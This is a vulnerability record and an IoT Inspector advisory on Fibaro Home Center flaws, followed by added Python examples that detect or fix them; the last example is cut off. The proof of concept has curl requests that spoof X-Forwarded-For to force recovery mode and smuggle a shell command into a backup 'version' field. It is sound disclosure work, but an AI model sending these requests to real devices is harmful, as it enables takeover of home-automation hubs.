            "db": "NVD",
            "id": "CVE-2021-20989",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20989",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "id": "VAR-202104-0467",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.451000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147739"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-295",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/862.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "date": "2021-04-19T14:15:11.570000",
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "date": "2022-08-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "date": "2024-11-21T05:47:20.583000",
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Trust Management Issue Vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0490

    Vulnerability from variot - Updated: 2024-11-23 22:05

    Fibaro Home Center 2 and Lite devices in all versions provide a web-based management interface over the unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens and passwords. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
                        https://www.fibaro.com/
    vulnerable version: 4.600 and older
         fixed version: 4.610
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991,
                        CVE-2021-20992
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
                        9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
              reported: 2020-11-18
           publication: 2021-04-08
                    by: Marton Illes, IoT Inspector Research Lab
                        https://www.iot-inspector.com/

    Vendor description:
    -------------------
    "FIBARO is a global brand based on the Internet of Things technology. It
    provides solutions for building and home automation. FIBARO's headquarters
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    employs app. 250 employees."

    https://www.fibaro.com/en/about-us/
    
    
    
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)
    Home Center devices initiate SSH connections to the Fibaro cloud to provide
    remote access and remote support capabilities. This connection can be
    intercepted using a man-in-the-middle attack and a device initiated remote
    port-forward channel can be used to connect to the web management interface.
    IoT Inspector identified a disabled SSH host key check, which enables
    man-in-the-middle attacks.

    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    (CVE-2021-20990)
    An internal management service is accessible on port 8000 and some API
    endpoints could be accessed without authentication to trigger a shutdown, a
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can
    upload firmware without authentication (potentially an earlier firmware
    version with a known remote command execution vulnerability, see #3).

    3) Authenticated remote command execution (versions before 4.550)
    (CVE-2021-20991)
    An authenticated user can run commands as root user using a command injection
    vulnerability.

    4) Unencrypted management interface (CVE-2021-20992)
    The management interface is only available over HTTP on the local network. The
    vendor recommends using the cloud-based management interface, which is
    accessible over HTTPS and requests are forwarded via an encrypted SSH
    connection between the Fibaro cloud and the device.
    
    
    
    
    
    Proof of concept:
    -----------------
    1) Cloud SSH Connection Man-in-the-Middle Attack

    Home Center devices initiate an SSH connection to the Fibaro cloud:

    ./etc/init.d/fibaro/RemoteAccess

    <snip>
    DAEMON=/usr/bin/ssh

    ....

    case "$1" in
      start)

                    .....

        # get IP
        local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

        # get PORT
        local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

                    ....

        start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"
    </snip>

    The device uses dropbear ssh to initiate the connection; option -y disables any
    host-key checks, voiding much of the otherwise added transport-layer security
    by SSH: "Always accept hostkeys if they are unknown."

    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.:
    lb-1.eu.ra.fibaro.com

    An attacker can use DNS spoofing or other means to intercept the connection. By
    using any hostkey, the attacker can successfully authenticate the SSH
    connection. Once the connection is authenticated, the client initiates a remote
    port-forward:
    -R "${PORT_Response}":localhost:80

    This enables the attacker to access port 80 (management interface) of the
    device.
    
    
    
    A similar problem exists for remote support connections:

    ./opt/fibaro/scripts/remote-support.lua
    <snip>
    function handleResponse(response)
      responseJson = json.decode(response.data)
      print(json.encode(responseJson))

      local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
      os.execute(autoSSHCommand)
    end

    function getSupportData()
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey
      print(remoteUrl)

      http = net.HTTPClient({timeout = 5000})

      http:request(remoteUrl, {
        options = {
          method = 'GET'
        },
        success = function(response)
          handleResponse(response)
        end,
        error = function(error)
          print(error)
        end
      })
    end

    getSupportData()
    </snip>

    Here, the remote support endpoint returns the following data:
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY.ZZZ"}

    The same dropbear ssh client is used with option -y. In this case, port 22
    (ssh) is made accessible through the port-forward. However, the device only
    allows public key authentication with a hard-coded SSH key. No further testing
    has been done on compromising the support SSH connection.
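    Both snippets above share one root cause: an SSH client started with host-key verification relaxed (dropbear's -y). A firmware reviewer wants to find every such invocation, including the indirect one where the client is referenced through a shell variable such as ${DAEMON}. The following Python audit script is an added example, not code from the advisory or from Fibaro; the sample file contents are constructed from the snippets above, and the RemoteAccess.fixed and backup-sync.sh entries are hypothetical files added to show a clean variant and an OpenSSH StrictHostKeyChecking=no case.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# SSH clients whose command lines are inspected: dropbear's client (dbclient, often
# installed as "ssh") and OpenSSH's ssh, optionally with a path prefix.
CLIENT_RE = re.compile(r"(?<![\w.-])(?:/[\w./-]*/)?(ssh|dbclient)(?=\s|$|['\"])")
# dropbear: -y accepts unknown host keys, -yy accepts any host key.
DROPBEAR_ACCEPT_RE = re.compile(r"(?<!\S)-y+(?!\S)")
# OpenSSH: -o StrictHostKeyChecking=no (or =off) silently accepts unknown keys.
OPENSSH_LAX_RE = re.compile(r"-o\s*StrictHostKeyChecking\s*=\s*(?:no|off)\b", re.I)
# Simple shell assignments such as DAEMON=/usr/bin/ssh, used to resolve ${DAEMON}.
ASSIGN_RE = re.compile(r"^\s*(?:local\s+)?([A-Za-z_]\w*)=(\S+)\s*$")
VAR_RE = re.compile(r"\$\{(\w+)\}|\$(\w+)")


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    reason: str


def expand_vars(line: str, env: Dict[str, str]) -> str:
    """Substitute $VAR / ${VAR} from assignments seen earlier in the same file."""
    return VAR_RE.sub(lambda m: env.get(m.group(1) or m.group(2), m.group(0)), line)


def check_line(line: str) -> Optional[str]:
    """Return a reason if the line invokes an SSH client with host-key checks relaxed."""
    for m in CLIENT_RE.finditer(line):
        rest = line[m.end():]
        if DROPBEAR_ACCEPT_RE.search(rest):
            return f"{m.group(1)} called with -y: unknown host keys are accepted"
        if OPENSSH_LAX_RE.search(rest):
            return f"{m.group(1)} called with StrictHostKeyChecking disabled"
    return None


def audit_files(files: Dict[str, str]) -> List[Finding]:
    """Scan {path: content} pairs (e.g. an unpacked firmware tree) line by line."""
    findings: List[Finding] = []
    for path, content in files.items():
        env: Dict[str, str] = {}
        for n, raw in enumerate(content.splitlines(), 1):
            m = ASSIGN_RE.match(raw)
            if m:
                env[m.group(1)] = m.group(2)
            reason = check_line(expand_vars(raw, env))
            if reason:
                findings.append(Finding(path, n, reason))
    return findings


# Constructed sample tree, adapted from the advisory's snippets plus two hypothetical files.
SAMPLE_FIRMWARE: Dict[str, str] = {
    "etc/init.d/fibaro/RemoteAccess": (
        'DAEMON=/usr/bin/ssh\n'
        'case "$1" in\n'
        '  start)\n'
        '    start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \\\n'
        '    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"\n'
    ),
    "opt/fibaro/scripts/remote-support.lua": (
        "local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip .. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip\n"
        "os.execute(autoSSHCommand)\n"
    ),
    # Hypothetical hardened variant: same invocation without -y (host key must be in known_hosts).
    "etc/init.d/fibaro/RemoteAccess.fixed": (
        'DAEMON=/usr/bin/ssh\n'
        '    -- -DmS ${NAME} ${DAEMON} -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"\n'
    ),
    # Hypothetical OpenSSH script with the equivalent weakness.
    "usr/bin/backup-sync.sh": 'ssh -o StrictHostKeyChecking=no backup@example.invalid true\n',
}


if __name__ == "__main__":
    for f in audit_files(SAMPLE_FIRMWARE):
        print(f"{f.path}:{f.line_no}: {f.reason}")
```

    Running it on an unpacked firmware root (replace SAMPLE_FIRMWARE with the files under ./etc and ./opt) lists each offending invocation with file and line. The fix the scan points to is to drop -y and ship a known_hosts entry for the cloud endpoint so that a spoofed lb-1.eu.ra.fibaro.com presenting a different host key is rejected.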
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode

    The device is running an nginx server, which forwards some requests to a
    lighttpd server (8000) for further processing:
    <snip>
                                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            location ~* \.php$ {
                proxy_pass   http://127.0.0.1:8000;
            }

            location ~* \.php\?.* {
                proxy_pass   http://127.0.0.1:8000;
            }
    </snip>

    The lighttpd server is not only accessible locally, but also via the local
    network.
    
    
    
    Authentication and authorization are implemented in PHP and there is a special
    check for connections originating from within the host. However, when checking
    the remote IP address, the header X-Forwarded-For is also considered:

    ./var/www/authorize.php
    <snip>
    function isLocalRequest()
    {
        $ipAddress = "";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
        else
            $ipAddress = $_SERVER['REMOTE_ADDR'];

        $whitelist = array( '127.0.0.1', '::1' );
        if(in_array($ipAddress, $whitelist))
            return true;

        return false;
    }
    </snip>

    As the lighttpd service is available via the network, an attacker can inject
    the required header X-Forwarded-For as well.

    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    <snip>
    <?php
        require_once("../../authorize.php");

        if (!isLocalRequest() && !isAuthorized())
        {
           sendUnauthorized();
        }
        else
        {
            exec("systemShutdown");
        }
    ?>
    </snip>

    ./var/www/services/system/reboot.php
    <snip>

    function authorize()
    {
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER));
    }

    function handlePOST($text)
    {
        if (!isLocalRequest() && !authorize())
        {
           sendUnauthorized();
           return;
        }

        $params = tryDecodeJson($text);
        if(!is_null($params) && isset($params->recovery) && $params->recovery === true)
            exec("rebootToRecovery");
        else
            exec("systemReboot");
    }

    $requestBody = file_get_contents('php://input');
    $requestMethod = $_SERVER['REQUEST_METHOD'];

    if ($requestMethod == "POST")
        handlePOST($requestBody);
    else
        setStatusMethodNotAllowed();

    </snip>

    An attacker can issue the following HTTP request to reboot the device into
    recovery mode:
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php

    In recovery mode, firmware images can be updated without authentication.
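    The defect in isLocalRequest() is that a header any client can write is preferred over the peer address the TCP stack reports. The following Python model is an added example (not the advisory's or Fibaro's code): it reproduces the advisory's decision next to a hardened one that only honours X-Forwarded-For when the peer is the trusted reverse proxy, and then only the element nginx's $proxy_add_x_forwarded_for appended last. The request scenarios and the trusted-proxy set (loopback, since nginx proxies to 127.0.0.1:8000 on the same box) are assumptions of this example.

```python
import ipaddress
from typing import Callable, Dict, Mapping, Optional

LOOPBACK = {"127.0.0.1", "::1"}
# Only the reverse proxy in front of lighttpd may set X-Forwarded-For. Assumption for
# this example: nginx runs on the same host, so loopback is the only trusted proxy peer.
TRUSTED_PROXIES = {"127.0.0.1", "::1"}


def is_local_request_vulnerable(server: Mapping[str, str]) -> bool:
    """Same decision as the advisory's isLocalRequest(): a client-supplied
    X-Forwarded-For header overrides the real peer address."""
    ip = server.get("HTTP_X_FORWARDED_FOR") or server.get("REMOTE_ADDR", "")
    return ip in LOOPBACK


def client_ip(server: Mapping[str, str]) -> Optional[str]:
    """Resolve the client address without trusting the header blindly."""
    remote = server.get("REMOTE_ADDR", "")
    if remote not in TRUSTED_PROXIES:
        # Direct connection (e.g. straight to port 8000): the peer IS the client and
        # any X-Forwarded-For it sent is attacker-controlled, so it is ignored.
        return remote
    xff = server.get("HTTP_X_FORWARDED_FOR", "")
    if not xff:
        return remote  # local call that did not pass through the proxy
    # $proxy_add_x_forwarded_for appends the peer nginx actually saw as the LAST
    # element; earlier elements came from the client and are not trusted.
    last = xff.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(last))
    except ValueError:
        return None  # malformed header: fail closed


def is_local_request_hardened(server: Mapping[str, str]) -> bool:
    return client_ip(server) in LOOPBACK


# Constructed request scenarios (CGI-style variables), not captures from a device.
SCENARIOS: Dict[str, Dict[str, str]] = {
    # LAN client talks to lighttpd:8000 directly and forges the header
    "direct_spoofed": {"REMOTE_ADDR": "192.168.1.50", "HTTP_X_FORWARDED_FOR": "127.0.0.1"},
    # same forgery, but sent through nginx, which appends the real peer
    "via_nginx_spoofed": {"REMOTE_ADDR": "127.0.0.1", "HTTP_X_FORWARDED_FOR": "127.0.0.1, 192.168.1.50"},
    # a process on the box calling through nginx
    "via_nginx_local": {"REMOTE_ADDR": "127.0.0.1", "HTTP_X_FORWARDED_FOR": "127.0.0.1"},
    # a process on the box calling lighttpd directly
    "direct_local": {"REMOTE_ADDR": "127.0.0.1"},
    # ordinary LAN client without the header
    "direct_lan": {"REMOTE_ADDR": "192.168.1.50"},
}


def evaluate(check: Callable[[Mapping[str, str]], bool]) -> Dict[str, bool]:
    """Run one decision function over every scenario."""
    return {name: check(env) for name, env in SCENARIOS.items()}


if __name__ == "__main__":
    for name in SCENARIOS:
        print(f"{name:20} vulnerable={is_local_request_vulnerable(SCENARIOS[name])!s:5} "
              f"hardened={is_local_request_hardened(SCENARIOS[name])}")
```

    Only direct_spoofed differs between the two functions, which is exactly the path the curl request above uses. The hardened logic still depends on port 8000 being reachable only by the proxy; binding lighttpd to 127.0.0.1 removes the direct path altogether and is the stronger fix.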
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)

    Backup & restore operations could be triggered through HTTP endpoints:

    ./var/www/services/system/backups.php
    <snip>
    function restoreBackup($params)
    {
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
        {
            setStatusTooManyRequests();
            return;
        }

        $type = $params->type;
        $id = $params->id;
        $version = $params->version;

        if (is_null($id) || !is_numeric($id) || $id < 1 )
        {
            setStatusBadRequest();
            return;
        }

        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");

        if ($type == "local" && $hcVersion == "HC2" || $type == "remote")
        {
            $version ?
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) :
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id);
        }
        else
        {
            setStatusBadRequest();
            return;
        }

        setStatusAccepted();
    }
    </snip>

    The parameter $version is not sanitized or escaped, which allows an attacker to
    inject shell commands into the exec() call:

    cat > /tmp/exploit <<- EOM
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}}
    EOM

    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php

    Version 4.550 and later have proper escaping:
    <snip>
        $version = escapeshellarg($params->version);
    </snip>
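    The 4.550 fix wraps the one unchecked field in escapeshellarg(), which is sufficient for a single argument, but the more robust pattern is to validate every field against an allowlist and hand the program an argv so that no shell parses user input at all. The following Python block is an added example (not the advisory's or Fibaro's code) that builds the restore command the pre-4.550 way, the 4.550 way (shlex.quote() is Python's counterpart of escapeshellarg()) and the argv way; the version format regex is an assumption, and shlex.split() is used only to show word boundaries, it does not model ";" as a command separator.

```python
import re
import shlex
from typing import List, Optional

ALLOWED_TYPES = {"local", "remote"}           # the two values backups.php accepts
# Assumption for this example: a backup version looks like a firmware version, e.g. 4.540.
VERSION_RE = re.compile(r"^[0-9]+(?:\.[0-9]+)*$")
INJECTED = "1; INJECTED COMMAND"              # the advisory's placeholder payload, used as test input


def build_command_pre_4550(btype: str, bid: int, version: Optional[str] = None) -> str:
    """Shell string built the way the pre-4.550 code did: raw concatenation."""
    cmd = f"screen -dmS RESTORE restoreBackup.sh --{btype} {bid}"
    if version:
        cmd += f" {version}"
    return cmd


def build_command_4550(btype: str, bid: int, version: Optional[str] = None) -> str:
    """The 4.550 fix: the version becomes one single-quoted shell word."""
    cmd = f"screen -dmS RESTORE restoreBackup.sh --{btype} {bid}"
    if version:
        cmd += " " + shlex.quote(str(version))
    return cmd


def shell_words(cmd: str) -> List[str]:
    """Word boundaries a POSIX shell would see in the command string."""
    return shlex.split(cmd)


def build_argv(btype: str, bid: int, version: Optional[str] = None) -> List[str]:
    """Defence in depth: allowlist every field and return an argv list meant for
    subprocess.run(argv) (no shell involved), raising ValueError on bad input."""
    if btype not in ALLOWED_TYPES:
        raise ValueError("unknown backup type")
    if not isinstance(bid, int) or isinstance(bid, bool) or bid < 1:
        raise ValueError("backup id must be a positive integer")
    argv = ["screen", "-dmS", "RESTORE", "restoreBackup.sh", f"--{btype}", str(bid)]
    if version is not None:
        if not VERSION_RE.match(str(version)):
            raise ValueError("backup version has an unexpected format")
        argv.append(str(version))
    return argv


def accepts(btype: str, bid: int, version: Optional[str] = None) -> bool:
    """True if build_argv would accept the request."""
    try:
        build_argv(btype, bid, version)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("pre-4.550 :", shell_words(build_command_pre_4550("remote", 1, INJECTED)))
    print("4.550     :", shell_words(build_command_4550("remote", 1, INJECTED)))
    print("argv      :", build_argv("remote", 1, "4.540"), "| payload accepted:", accepts("remote", 1, INJECTED))
```

    In the first line of output the payload is split into three words with the ";" still live for a real shell; in the second it stays a single word; the argv builder rejects it outright, which also gives the API a clean 400 response instead of a shell error.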
    
    
    
    
    
    4) Unencrypted management interface

    Nmap shows a few open ports on the box:
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8000/tcp open  http-alt

    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP.
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:
    -----------------------------
    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version
    at the time of the discovery.
    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530.

    Solution:
    ---------
    Upgrade to version 4.610 or the latest version, which fixes vulnerabilities 1,
    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is
    trusted and the device only provides wired network access. Furthermore, the
    vendor recommends using the cloud-based management interface, which is
    accessible over HTTPS and requests are forwarded via an encrypted SSH
    connection between the Fibaro cloud and the device.

    Advisory URL:
    -------------
    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:
    ------------------------
    2020-11-18: Contacting Fibaro through support@fibaro.com,
                support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn
    2020-11-24: Advisory sent to Fibaro by email
    2020-12-01: Fibaro confirmed the receipt of the advisory
    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes
    2021-03-16: Fibaro beta release (4.601) with the fixes
    2021-03-24: Fibaro applies for CVE numbers
    2021-03-31: Fibaro GA release (4.610) with the fix
    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector.

    IoT Inspector is a platform for automated security analysis and compliance
    checks of IoT firmware. Our mission is to secure the Internet of Things. In
    order to discover vulnerabilities and vulnerability patterns within IoT devices
    and to further enhance automated identification that allows for scalable
    detection within IoT Inspector, we conduct extensive security research in the
    area of IoT.

    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT
    firmware, we aim to responsibly disclose relevant information to the vendor
    of the affected IoT device as well as the general public in a way that
    minimizes potential harm and encourages further security analyses of IoT
    systems.

    You can find our responsible disclosure policy here:
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021
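    The root cause of item 2 above (CVE-2021-20990) is that the device's
    authorize.php lets a client-supplied X-Forwarded-For header stand in for
    the TCP peer address when deciding whether a request is "local". The block
    below is an added example, not the device's code: it reimplements that
    isLocalRequest() check in Python in its vulnerable form next to a hardened
    form, and runs both against constructed requests modelled as CGI-style
    environ dicts (REMOTE_ADDR is the TCP peer, HTTP_X_FORWARDED_FOR the
    header). The 192.168.1.50 client and the reboot_endpoint() gate are
    constructed for the demonstration.

```python
# Added example (not Fibaro's code): the isLocalRequest() check from item 2
# of the advisory, vulnerable form beside a hardened form.

LOOPBACK = frozenset({"127.0.0.1", "::1"})


def is_local_request_vulnerable(environ: dict) -> bool:
    """Mirror of the advisory's PHP: a client-controlled header decides."""
    ip = environ.get("HTTP_X_FORWARDED_FOR") or environ.get("REMOTE_ADDR", "")
    return ip in LOOPBACK


def is_local_request_hardened(environ: dict) -> bool:
    """Only the TCP peer address can grant the 'local' privilege.

    On the device, nginx (port 80) proxies *.php to lighttpd (port 8000) and
    appends the real client to X-Forwarded-For, so a loopback peer that
    carries that header is a forwarded external client, not a local process.
    Nothing a client can write into a header is trusted.
    """
    if environ.get("REMOTE_ADDR", "") not in LOOPBACK:
        return False
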